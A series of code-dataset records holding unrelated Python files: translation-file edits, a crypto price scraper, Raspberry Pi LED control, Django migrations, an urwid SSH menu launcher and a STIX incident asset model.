+{"seq_id":"42251555","text":"from config import source_dir, pofile\n\nfiles = source_dir.glob('**/*.po')\n\nfor file in files:\n    changed = False\n    po = pofile(file.open())\n    for unit in po.units:\n        for i, msgid in enumerate(unit.msgid):\n            if 'immersion' in msgid:\n                unit.msgid[i] = msgid.replace('immersion', 'samādhi')\n                changed = True\n    if changed:\n        po.save()","sub_path":".scripts/immersion.py","file_name":"immersion.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287957625","text":"def test_simple_guess(test_dataset):\n    \"\"\"\n    \"\"\"\n\n    ## imortation\n    import pandas as pd\n    from . 
import item4_parser\n from sklearn import metrics\n\n ## parameters\n match_prediction = []\n match_label = []\n\n ## load test dataset\n df = pd.read_csv(test_dataset)\n for index, row in df.iterrows():\n\n #-> loop over each entry\n title = row['TITLE']\n abstract = row['ABSTRACT']\n present = row['ITEM4']\n\n ## update list of labels\n match_label.append(present)\n\n ## run item1 parser\n match = item4_parser.simple_guess(title, abstract)\n\n ## update list of preditcion\n if(match):\n match_prediction.append(1)\n else:\n match_prediction.append(0)\n\n ## compure accuracy\n acc_score = metrics.accuracy_score(match_label, match_prediction)\n\n ## compute auc\n fpr, tpr, thresholds = metrics.roc_curve(match_label, match_prediction)\n auc_score = metrics.auc(fpr, tpr)\n\n ## return acc and auc as a tuple\n return(acc_score, auc_score)\n","sub_path":"scorer/test_item4_parser.py","file_name":"test_item4_parser.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140190981","text":"from database import *\nimport datetime\nimport time\n\npricesql = PricesSQL()\nusers = UsersSQL()\nprojectfolder = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nlatestprice={}\nret = {}\nct = datetime.datetime.now()\n\nfor crypto in users.get_coins_in_table():\n ret[crypto] = None\n\nlatestprice['prices'] = ret\nlatestprice['timestamp'] = int(round(ct.timestamp()))\n\nfor crypto in latestprice['prices']:\n\n #this try and except is to make sure that the api is working.\n #Various tries are made until the API actually sends the json\n scraped=False\n while scraped==False:\n try:\n response= requests.get(f'https://api.coingecko.com/api/v3/simple/price?ids={crypto}&vs_currencies=usd')\n response=response.json()\n response[crypto]\n response=dict(response)\n scraped=True\n except:\n time.sleep(1)\n \n latestprice['prices'][crypto]=round(response[crypto]['usd'],6)\n \n\nwith open(os.path.join(projectfolder,\"data\",\"latestprices.json\"), \"w\") as f:\n latestprice=json.dump(latestprice,f,indent=0) \n","sub_path":"src/bandaid2.py","file_name":"bandaid2.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441223290","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nfrom multiprocessing import Process\n\n#setup\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False) \nGPIO.setup(2, GPIO.OUT) \nGPIO.setup(3, GPIO.OUT) \nGPIO.setup(4, GPIO.OUT) \nGPIO.setup(17, GPIO.OUT) \nGPIO.setup(27, GPIO.OUT)\n\n#flash single cell\ndef flashCell(cellNum):\n\tflashPeriod = random.uniform(0.05, 0.1)\n\tholdPeriod = random.uniform(0.1, 0.5)\n\tflashRepeat = random.randint(1,4)\n\tfor i in range(0, flashRepeat):\n\t\tGPIO.output(cellNum, GPIO.HIGH)\n\t\ttime.sleep(flashPeriod)\n\t\tGPIO.output(cellNum, GPIO.LOW)\n\t\ttime.sleep(flashPeriod)\n\tGPIO.output(cellNum, GPIO.HIGH)\n\ttime.sleep(holdPeriod)\n\tGPIO.output(cellNum, GPIO.LOW)\n\n#specific cell functions\ndef flashCell1():\n\tflashCell(2)\ndef flashCell2():\t\n\tflashCell(3)\ndef flashCell3():\n\tflashCell(4)\ndef flashCell4():\n\tflashCell(17)\ndef flashCell5():\n\tflashCell(27)\n\n\n#main loop\nlength=random.randint(1,7)\nfor i in range(0,length):\n\tp1 = Process(target=flashCell1)\n\tp2 = Process(target=flashCell2)\n\tp3 = Process(target=flashCell3)\n\tp4 = Process(target=flashCell4)\n\tp5 = Process(target=flashCell5)\n\tcell_array = [p1,p2,p3,p4,p5]\n\t\n\twhile 
len(cell_array) > 0:\n\t\trandindex = random.randint(0, len(cell_array) - 1)\n\t\tprocess = cell_array[randindex]\n\t\tif random.randint(0,1) > 0:\n\t\t\tprocess.start()\n\t\tcell_array.remove(process)\n\t\ttime.sleep(random.uniform(0, 0.4))\n\ttime.sleep(random.uniform(0.5,2))\n","sub_path":"lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"227955207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\n\ndef read_json_file (json_file):\n print (json_file)\n with open(json_file, 'r') as f:\n data = json.load(f)\n print (data)\n return (data)\n\nfilename = '/Users/rgarzon/Documents/Projects/POC_Lunas/Signature/AXA_ES/DNI_data/annotations/2.0/train/[43055801].pdf-1.json'\ndata = read_json_file(filename)\n\nfor obj in data['objects']:\n print (i)","sub_path":"signature/dni2.0_signature_detection/test_read_json.py","file_name":"test_read_json.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"131327100","text":"\"\"\"\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport os\nfrom django.utils import timezone\nfrom gwells.codes import CodeFixture\nfrom registries.models import Organization\nfrom registries.serializers import OrganizationAdminSerializer\n\ndef insert_remove_reasons(apps, schema_editor):\n data = {\n 'FAILTM': {\n 'description': 'Fails to maintain a requirement for registration',\n 'display_order': 1\n },\n 'NLACT': {\n 'description': 'No longer actively working in Canada',\n 'display_order': 2\n },\n 'NMEET': {\n 'description': 'Fails to meet a requirement for registration',\n 'display_order': 3\n }\n }\n RegistriesRemovalReason = apps.get_model('registries', 'RegistriesRemovalReason')\n\n for (key, value) in data.items():\n RegistriesRemovalReason.objects.update_or_create(code=key, defaults=value)\n\n\ndef revert_remove_reasons(apps, schema_editor):\n # We don't need to do anything on revert\n pass\n\n\ndef activity_codes():\n fixture = 'migrations/activity_codes.json'\n fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)\n return CodeFixture(fixture_path)\n\n\ndef load_activity_codes(apps, schema_editor):\n return activity_codes().update_or_create_fixture(apps, schema_editor)\n\n\ndef unload_activity_codes(apps, schema_editor):\n return activity_codes().unload_fixture(apps, schema_editor)\n\n\ndef subactivity_codes():\n fixture = 'migrations/subactivity_codes.json'\n fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)\n return CodeFixture(fixture_path)\n\n\ndef load_subactivity_codes(apps, schema_editor):\n ActivityCode = apps.get_model('registries', 'ActivityCode')\n codes = subactivity_codes()\n for item in codes.fixture:\n # Turns strings into models\n item['fields']['registries_activity'] = ActivityCode.objects.get(pk=item['fields']['registries_activity'])\n return 
codes.update_or_create_fixture(apps, schema_editor)\n\n\ndef unload_subactivity_codes(apps, schema_editor):\n return subactivity_codes().unload_fixture(apps, schema_editor)\n\ndef populate_empty_geometries(apps, schema_editor):\n \"\"\"\n Populate the geom field for all Organizations that meet the following\n criteria:\n 1. 'geom' is currently null\n 2. Either 'street_address' and 'city' are not null, or just 'city' is not null\n 3. 'province_state' is BC\n 4. The Organization's database record isn't expired\n The 'geom' field is populated by executing a no-change update \n on the organization serializer. This triggers the serializer to \n attempt to populate the geometry by geocoding the street address\n and/or city.\n \"\"\"\n orgs_to_update = \\\n Organization.objects.filter(\n geom__isnull=True, \n city__isnull=False,\n province_state__exact=\"BC\",\n expiry_date__gt=timezone.now()\n )\n for org in orgs_to_update:\n serializer = OrganizationAdminSerializer(org)\n validated_data = {\n \"city\": org.city #no change\n }\n serializer.update(org, validated_data)","sub_path":"app/backend/registries/data_migrations.py","file_name":"data_migrations.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395269178","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread\nimport time\n\n\nclass Consumer(Thread):\n \"\"\"\n Class that represents a consumer.\n \"\"\"\n\n def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n :type carts: List\n :param carts: a list of add and remove operations\n\n :type marketplace: Marketplace\n :param marketplace: a reference to the marketplace\n\n :type retry_wait_time: Time\n :param retry_wait_time: the number of seconds that a producer must wait\n until the Marketplace becomes available\n\n :type kwargs:\n :param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n\n Thread.__init__(self, **kwargs)\n\n self.carts = carts\n self.marketplace = marketplace\n self.retry_wait_time = retry_wait_time\n\n def run(self):\n\n for cart in self.carts:\n cart_id = self.marketplace.new_cart() #create cart_id for every list of add and remove\n\n for ops in cart: #loop for every operations\n while ops[\"quantity\"] != 0: #while quantity if not 0\n if ops[\"type\"] == \"add\": #verify if the operatio is to add or\n ret = self.marketplace.add_to_cart(cart_id, ops[\"product\"])\n if ret:\n ops[\"quantity\"] -= 1\n else:\n time.sleep(self.retry_wait_time)\n elif ops[\"type\"] == \"remove\": #remove from cart\n ret = self.marketplace.remove_from_cart(cart_id, ops[\"product\"])\n if ret is None: # if rezult is true substract from quantity else\n ops[\"quantity\"] -= 1\n else:\n time.sleep(self.retry_wait_time) #wait given times\n\n self.marketplace.place_order(cart_id) #at the end call place_order\n","sub_path":"tema/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336054911","text":"#!/usr/bin/env python3\n\nimport re\nimport os\n\nclass Completer(object):\n def __init__(self):\n self.commands = ['ls', 'cd', 'download', 'upload', 'rename', 'mkdir', 'rm']\n self.re_space = re.compile('.*\\s+$', re.M)\n self.dic_file = []\n self.dic_dir = []\n\n def _listdir(self, root):\n \"List directory 
'root' appending the path separator to subdirs.\"\n res = []\n for name in os.listdir(root):\n path = os.path.join(root, name)\n if os.path.isdir(path):\n name += os.sep\n res.append(name)\n return res\n\n def _complete_path(self, path=None):\n \"Perform completion of filesystem path.\"\n if not path:\n return self._listdir('.')\n dirname, rest = os.path.split(path)\n tmp = dirname if dirname else '.'\n res = [os.path.join(dirname, p)\n for p in self._listdir(tmp) if p.startswith(rest)]\n # more than one match, or single match which does not exist (typo)\n if len(res) > 1 or not os.path.exists(path):\n return res\n # resolved to a single directory, so return list of files below it\n if os.path.isdir(path):\n return [os.path.join(path, p) for p in self._listdir(path)]\n # exact file match terminates this completion\n return [path + ' ']\n\n def _complete_dic_all(self, arg=None):\n \"read from self.dic and match the arg, return the matchs.\"\n if not arg:\n return (self.dic_dir + self.dic_file)\n else:\n arg_match = re.compile(arg)\n return [name for name in (self.dic_dir + self.dic_file) if arg_match.match(name)]\n\n def _complete_dic_dir(self, arg=None):\n if not arg:\n return self.dic_dir\n else:\n arg_match = re.compile(arg)\n return [name for name in self.dic_dir if arg_match.match(name)]\n\n def _complete_dic_file(self, arg=None):\n if not arg:\n return self.dic_file\n else:\n arg_match = re.compile(arg)\n return [name for name in self.dic_file if arg_match.match(name)]\n\n def complete_ls(self, args):\n if not args:\n return self._complete_dic_dir()\n else:\n return self._complete_dic_dir(args[0])\n\n def complete_cd(self, args):\n if not args:\n return self._complete_dic_dir()\n else:\n return self._complete_dic_dir(args[0])\n\n def complete_download(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n elif len(args) == 2:\n return self._complete_path(args[1])\n else:\n return []\n\n def complete_upload(self, args):\n if not args:\n return self._complete_path('.')\n elif len(args) == 1:\n return self._complete_path(args[0])\n elif len(args) == 2:\n return self._complete_dic_dir(args[1])\n else:\n return []\n\n def complete_rename(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n else:\n return []\n\n def complete_rm(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n else:\n return []\n\n def complete(self, text, state):\n \"Generic readline completion entry point.\"\n buffer = readline.get_line_buffer()\n line = readline.get_line_buffer().split()\n # show all commands\n if not line:\n return [c + ' ' for c in self.commands][state]\n # account for last argument ending in a space\n if self.re_space.match(buffer):\n line.append('')\n # resolve command to the implementation function\n cmd = line[0].strip()\n if cmd in self.commands:\n impl = getattr(self, 'complete_%s' % cmd)\n args = line[1:]\n if args:\n return (impl(args) + [None])[state]\n return [cmd + ' '][state]\n results = [c + ' ' for c in self.commands if c.startswith(cmd)] + [None]\n return results[state]\n","sub_path":"python3_version/Completer.py","file_name":"Completer.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326585910","text":"import sys\n\nclass pfam_hit:\n def __init__(self, prot_id, org, 
pf_id, pf_acc, pf_order, pf_count, start, end, score, eval):\n self.prot_id = prot_id\n self.org = org\n self.pf_id = pf_id\n self.pf_acc = pf_acc\n self.pf_order = pf_order\n self.pf_count = pf_count\n self.start = start\n self.end = end\n self.score = score\n self.eval = eval\n\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"643066580","text":"# Copyright (c) 2014, The MITRE Corporation. All rights reserved.\r\n# See LICENSE.txt for complete terms.\r\n\r\n\r\nimport stix\r\nfrom stix.common import VocabString, StructuredText\r\nimport stix.bindings.incident as incident_binding\r\nfrom .property_affected import PropertyAffected\r\nfrom cybox.core import Observables\r\nfrom stix.common.vocabs import OwnershipClass, ManagementClass, LocationClass\r\n\r\nclass AffectedAsset(stix.Entity):\r\n _namespace = \"http://stix.mitre.org/Incident-1\"\r\n _binding = incident_binding\r\n _binding_class = incident_binding.AffectedAssetType\r\n \r\n def __init__(self):\r\n self.type_ = None\r\n self.description = None\r\n self.business_function_or_role = None\r\n self.ownership_class = None\r\n self.management_class = None\r\n self.location_class = None\r\n #self.location = None\r\n self.nature_of_security_effect = None\r\n self.structured_description = None\r\n \r\n @property\r\n def type_(self):\r\n return self._type\r\n \r\n @type_.setter\r\n def type_(self, value):\r\n if not value:\r\n self._type = None\r\n elif isinstance(value, AssetType):\r\n self._type = value\r\n else:\r\n self._type = AssetType(value=value)\r\n \r\n @property\r\n def description(self):\r\n return self._description\r\n \r\n @description.setter\r\n def description(self, value):\r\n if not value:\r\n self._description = None\r\n elif isinstance(value, StructuredText):\r\n self._description = value\r\n else:\r\n self._description = StructuredText(value)\r\n \r\n @property\r\n def business_function_or_role(self):\r\n return self._business_function_or_role\r\n \r\n @business_function_or_role.setter\r\n def business_function_or_role(self, value):\r\n if not value:\r\n self._business_function_or_role = None\r\n elif isinstance(value, StructuredText):\r\n self._business_function_or_role = value\r\n else:\r\n self._business_function_or_role = StructuredText(value)\r\n \r\n @property\r\n def ownership_class(self):\r\n return self._ownership_class\r\n \r\n @ownership_class.setter\r\n def ownership_class(self, value):\r\n if not value:\r\n self._ownership_class = None\r\n elif isinstance(value, VocabString):\r\n self._ownership_class = value\r\n else:\r\n self._ownership_class = OwnershipClass(value)\r\n \r\n @property\r\n def management_class(self):\r\n return self._management_class\r\n \r\n @management_class.setter\r\n def management_class(self, value):\r\n if not value:\r\n self._management_class = None\r\n elif isinstance(value, VocabString):\r\n self._management_class = value\r\n else:\r\n self._management_class = ManagementClass(value)\r\n \r\n @property\r\n def location_class(self):\r\n return self._location_class\r\n \r\n @location_class.setter\r\n def location_class(self, value):\r\n if not value:\r\n self._location_class = None\r\n elif isinstance(value, VocabString):\r\n self._location_class = value\r\n else:\r\n self._location_class = LocationClass(value)\r\n \r\n @property\r\n def nature_of_security_effect(self):\r\n return self._nature_of_security_effect\r\n \r\n 
@nature_of_security_effect.setter\r\n def nature_of_security_effect(self, value):\r\n self._nature_of_security_effect = []\r\n if not value:\r\n return\r\n elif isinstance(value, list):\r\n for v in value:\r\n self.add_property_affected(v)\r\n else:\r\n self.add_property_affected(value)\r\n \r\n def add_property_affected(self, v):\r\n if not v:\r\n return\r\n elif isinstance(v, PropertyAffected):\r\n self.nature_of_security_effect.append(v)\r\n else:\r\n raise ValueError('Cannot add type %s to nature_of_security_effect list' % type(v))\r\n \r\n @property\r\n def structured_description(self):\r\n return self._structured_description\r\n \r\n @structured_description.setter\r\n def structured_description(self, value):\r\n if not value:\r\n self._structured_description = None\r\n elif isinstance(value, Observables):\r\n self._structured_description = value\r\n else:\r\n self._structured_description = Observables(value)\r\n \r\n @classmethod\r\n def from_obj(cls, obj, return_obj=None):\r\n if not obj:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n return_obj.type_ = AssetType.from_obj(obj.get_Type())\r\n return_obj.description = StructuredText.from_obj(obj.get_Description())\r\n return_obj.business_function_or_role = StructuredText.from_obj(obj.get_Business_Function_Or_Role())\r\n return_obj.owernship_class = VocabString.from_obj(obj.get_Ownership_Class())\r\n return_obj.management_class = VocabString.from_obj(obj.get_Management_Class())\r\n return_obj.location_class = VocabString.from_obj(obj.get_Location_Class())\r\n #return_obj.location = None \r\n \r\n if obj.get_Nature_Of_Security_Effect():\r\n n = obj.get_Nature_Of_Security_Effect()\r\n return_obj.nature_of_security_effect = [PropertyAffected.from_obj(x) for x in n.get_Property_Affected()]\r\n return return_obj\r\n \r\n def to_obj(self, return_obj=None):\r\n if not return_obj:\r\n return_obj = self._binding_class()\r\n \r\n if self.type_:\r\n return_obj.set_Type(self.type_.to_obj())\r\n if self.description:\r\n return_obj.set_Description(self.description.to_obj())\r\n if self.business_function_or_role:\r\n return_obj.set_Business_Function_Or_Role(self.business_function_or_role.to_obj())\r\n if self.ownership_class:\r\n return_obj.set_Ownership_Class(self.ownership_class.to_obj())\r\n if self.management_class:\r\n return_obj.set_Management_Class(self.management_class.to_obj())\r\n if self.location_class:\r\n return_obj.set_Location_Class(self.location_class.to_obj())\r\n# if self.location:\r\n# return_obj.set_Location(self.location.to_obj())\r\n if self.nature_of_security_effect:\r\n property_affected_list = [x.to_obj() for x in self.nature_of_security_effect]\r\n n = self._binding.NatureOfSecurityEffectType(Property_Affected=property_affected_list)\r\n return_obj.set_Nature_Of_Security_Effect(n)\r\n if self.structured_description:\r\n return_obj.set_Structured_Description(self.structured_description.to_obj()) \r\n \r\n return return_obj\r\n \r\n @classmethod\r\n def from_dict(cls, d, return_obj=None):\r\n if not d:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n return_obj.type_ = AssetType.from_dict(d.get('type'))\r\n return_obj.description = StructuredText.from_dict(d.get('description'))\r\n return_obj.business_function_or_role = StructuredText.from_dict(d.get('business_function_or_role'))\r\n return_obj.ownership_class = OwnershipClass.from_dict(d.get('ownership_class'))\r\n return_obj.management_class = ManagementClass.from_dict(d.get('management_class'))\r\n return_obj.location_class = 
LocationClass.from_dict(d.get('location_class'))\r\n #return_obj.location = Location.from_dict(d.get('location'))\r\n return_obj.nature_of_security_effect = [PropertyAffected.from_dict(x) for x in d.get('nature_of_security_effect')]\r\n return_obj.structured_description = Observables.from_dict(d.get('structured_description'))\r\n return return_obj\r\n \r\n def to_dict(self):\r\n d = {}\r\n if self.type_:\r\n d['type'] = self.type_.to_dict()\r\n if self.description:\r\n d['description'] = self.description.to_dict()\r\n if self.business_function_or_role:\r\n d['business_function_or_role'] = self.business_function_or_role.to_dict()\r\n if self.ownership_class:\r\n d['ownership_class'] = self.ownership_class.to_dict()\r\n if self.management_class:\r\n d['management_class'] = self.management_class.to_dict()\r\n if self.location_class:\r\n d['location_class'] = self.location_class.to_dict()\r\n# if self.location:\r\n# d['location'] = self.location.to_dict()\r\n if self.nature_of_security_effect:\r\n d['nature_of_security_effect'] = [x.to_dict() for x in self.nature_of_security_effect]\r\n if self.structured_description:\r\n d['structured_description'] = self.structured_description.to_dict()\r\n return d\r\n \r\n#from stix.common.vocabs import AssetType as DefaultAssetType\r\n\r\nclass AssetType(VocabString):\r\n _namespace = \"http://stix.mitre.org/Incident-1\"\r\n _binding = incident_binding\r\n _binding_class = incident_binding.AssetTypeType\r\n \r\n def __init__(self, value=None, count_affected=None):\r\n self.count_affected = count_affected\r\n super(AssetType, self).__init__(value)\r\n \r\n def is_plain(self):\r\n '''Override VocabString.is_plain()'''\r\n return False\r\n \r\n @classmethod\r\n def from_obj(cls, obj, return_obj=None):\r\n if not obj:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n super(AssetType, cls).from_obj(obj, return_obj=return_obj)\r\n return_obj.count_affected = obj.get_count_affected()\r\n return return_obj\r\n \r\n def to_obj(self, return_obj=None):\r\n if not return_obj:\r\n return_obj = self._binding_class()\r\n \r\n super(AssetType, self).to_obj(return_obj=return_obj)\r\n return_obj.set_count_affected(self.count_affected)\r\n return return_obj\r\n \r\n @classmethod\r\n def from_dict(cls, d, return_obj=None):\r\n if not d:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n super(AssetType, cls).from_dict(d, return_obj=return_obj)\r\n return_obj.count_affected = d.get('count_affected')\r\n return return_obj\r\n \r\n def to_dict(self):\r\n d = super(AssetType, self).to_dict()\r\n if self.count_affected:\r\n d['count_affected'] = self.count_affected\r\n return d\r\n \r\n \r\n","sub_path":"stix-1.1.1.0/stix/incident/affected_asset.py","file_name":"affected_asset.py","file_ext":"py","file_size_in_byte":10524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420917953","text":"from __future__ import absolute_import\n\nfrom collections import OrderedDict\nimport atexit\nimport subprocess\n\nimport urwid\n\nimport ssh_facade.cli\nimport ssh_facade.configuration\nimport ssh_facade.logging\nimport ssh_facade.utils\n\n\n__all__ = ['entry_point']\n\n\n@ssh_facade.utils.instantiate()\nclass Application(object):\n\n def __init__(self):\n self.__mainloop = None\n self.__root = None\n\n @property\n def mainloop(self):\n return self.__mainloop\n\n @mainloop.setter\n def mainloop(self, value):\n self.__mainloop = value\n\n @property\n def root(self):\n return self.__root\n\n 
@root.setter\n def root(self, value):\n self.__root = value\n\n def reset_root_widget(self, top_w):\n self.root = urwid.Overlay(\n top_w, urwid.SolidFill(' '),\n align='center', width=('relative', 80),\n valign='middle', height=('relative', 90),\n min_width=20, min_height=9)\n\n if self.mainloop is not None:\n self.mainloop.widget = self.root\n\n def exit(self, delay=None):\n if delay is None:\n raise urwid.ExitMainLoop()\n\n self.mainloop.set_alarm_in(int(delay), lambda *_: Application.exit())\n\n def exit_on_q(self, key):\n if key not in ('q', 'Q'):\n return\n\n self.exit()\n\n def start_ssh_session(self, parameters):\n ssh_facade.logging.info(\n __name__, 'schedule ssh session;%s', repr(parameters))\n atexit.register(subprocess.call, parameters)\n self.exit()\n\n def ssh_parameters(self, server, recipe):\n result = ['ssh']\n\n try:\n result.extend(['-l', server['username']])\n except KeyError:\n pass\n\n try:\n result.extend(['-p', str(server['port'])])\n except KeyError:\n pass\n\n identity_path = ssh_facade.cli.parameters().identity\n\n if identity_path is not None:\n result.extend(['-i', identity_path])\n\n result.append(server['hostname'])\n\n if recipe['command'] is not None:\n result.extend(['-t', recipe['command']])\n\n return result\n\n\nclass PressAnyKeyToExit(urwid.Filler):\n\n def __init__(self, message):\n prompt = '\\n'.join([message, 'Press any key to exit...'])\n body = urwid.Edit(prompt, align='center')\n\n super(PressAnyKeyToExit, self).__init__(body, valign='top')\n\n def keypress(self, size, key):\n Application.exit()\n\n\nclass YorNPrompt(urwid.Filler):\n\n def __init__(self, message):\n prompt = ' '.join([message, '(y\\\\n)'])\n body = urwid.Edit(prompt, align='center')\n\n super(YorNPrompt, self).__init__(body, valign='top')\n\n def keypress(self, size, key):\n if key == 'y':\n return True\n if key == 'n':\n return False\n return None\n\n\nclass ConfigurationTemplatePrompt(YorNPrompt):\n\n def __init__(self):\n super(ConfigurationTemplatePrompt, self).__init__(\n 'Configuration file does not exist, create template?')\n\n def keypress(self, size, key):\n response = super(\n ConfigurationTemplatePrompt, self).keypress(size, key)\n\n if response is None:\n self.__show_response('Invalid input.')\n elif response:\n config_path = ssh_facade.configuration.create_servers_template()\n self.__show_response(\n 'Configuration template saved into \"{}\".'.format(config_path))\n else:\n self.__show_response('Bye!')\n\n def __show_response(self, message):\n Application.reset_root_widget(PressAnyKeyToExit(message))\n\n\nclass RecipeConfirmationPrompt(YorNPrompt):\n\n def __init__(self, ssh_parameters):\n self.__ssh_parameters = ssh_parameters\n super(RecipeConfirmationPrompt, self).__init__(\n '\\n'.join([' '.join(ssh_parameters), 'Continue?']))\n\n def keypress(self, size, key):\n response = super(\n RecipeConfirmationPrompt, self).keypress(size, key)\n\n if response is None:\n self.__show_response('Invalid input.')\n elif response:\n Application.start_ssh_session(self.__ssh_parameters)\n else:\n self.__show_response('Bye!')\n\n def __show_response(self, message):\n Application.reset_root_widget(PressAnyKeyToExit(message))\n\n\nclass ServerSelect(urwid.TreeListBox):\n\n class NodeWidget(urwid.TreeWidget):\n def __init__(self, node):\n super(ServerSelect.NodeWidget, self).__init__(node)\n self._w = urwid.AttrWrap(self._w, None)\n self._w.focus_attr = 'reversed'\n\n def get_display_text(self):\n node = self.get_node().get_value()\n\n if 'servers' in node.keys():\n return 
'servers'\n\n return node['alias']\n\n def selectable(self):\n return True\n\n class ParentNodeWidget(NodeWidget):\n def __init__(self, node):\n super(ServerSelect.ParentNodeWidget, self).__init__(node)\n\n if 'servers' not in node.get_value().keys():\n self._toggle(False)\n\n def keypress(self, size, key):\n if key in ('enter', 'l'):\n self._toggle()\n elif key == 'j':\n key = 'down'\n elif key == 'k':\n key = 'up'\n\n return super(ServerSelect.ParentNodeWidget, self).keypress(size, key)\n\n def _toggle(self, value=None):\n if value is None:\n self.expanded = not self.expanded\n else:\n self.expanded = bool(value)\n\n self.update_expanded_icon()\n\n class LeafNodeWidget(NodeWidget):\n def keypress(self, size, key):\n if key in ('enter', 'l'):\n node = self.get_node()\n parent = node.get_parent()\n\n self.__on_recipe_selected(parent.get_value(), node.get_value())\n elif key == 'j':\n key = 'down'\n elif key == 'k':\n key = 'up'\n\n return super(ServerSelect.LeafNodeWidget, self).keypress(size, key)\n\n def __on_recipe_selected(self, server, recipe):\n ssh_parameters = Application.ssh_parameters(server, recipe)\n\n if not recipe.get('needs_confirmation', False):\n Application.start_ssh_session(ssh_parameters)\n return\n\n Application.reset_root_widget(RecipeConfirmationPrompt(ssh_parameters))\n\n class TreeLeaf(urwid.TreeNode):\n def load_widget(self):\n return ServerSelect.LeafNodeWidget(self)\n\n class TreeNode(urwid.ParentNode):\n\n def load_widget(self):\n return ServerSelect.ParentNodeWidget(self)\n\n def load_child_keys(self):\n data = self.get_value()\n\n if 'servers' in data:\n return list(data['servers'].keys())\n\n if 'recipes' in data:\n return list(data['recipes'].keys())\n\n ssh_facade.logging.critical(\n __name__, 'load_child_keys:data;%s', repr(data))\n raise NotImplementedError()\n\n def load_child_node(self, key):\n childdepth = self.get_depth() + 1\n\n if childdepth == 1:\n childdata = self.get_value()['servers'][key]\n elif childdepth == 2:\n childdata = self.get_value()['recipes'][key]\n else:\n ssh_facade.logging.critical(\n __name__,\n 'load_child_node:(key, childdepth);%s',\n repr((key, childdepth)))\n raise NotImplementedError()\n\n if 'recipes' in childdata:\n childclass = ServerSelect.TreeNode\n else:\n childclass = ServerSelect.TreeLeaf\n\n return childclass(\n childdata, parent=self, key=key, depth=childdepth)\n\n def __init__(self, servers):\n def list_to_dict(list_):\n return OrderedDict(sorted(\n ((item['alias'], item) for item in list_),\n key=lambda pair: pair[0]))\n\n servers_tree = list_to_dict(servers)\n\n for alias, server in servers_tree.items():\n server['recipes'] = list_to_dict(server['recipes'])\n\n tree_root = dict(servers=servers_tree)\n super(ServerSelect, self).__init__(\n urwid.TreeWalker(ServerSelect.TreeNode(tree_root)))\n\n\ndef entry_point():\n try:\n root_widget = ServerSelect(ssh_facade.configuration.servers())\n except ssh_facade.configuration.ServersNotConfigured:\n root_widget = ConfigurationTemplatePrompt()\n\n Application.reset_root_widget(root_widget)\n Application.mainloop = urwid.MainLoop(\n Application.root,\n palette=[('reversed', 'standout', '')],\n unhandled_input=Application.exit_on_q)\n\n Application.mainloop.run()\n\n","sub_path":"ssh_facade/urwid.py","file_name":"urwid.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611362444","text":"# Copyright 2021 Amazon.com, Inc. or its affiliates. 
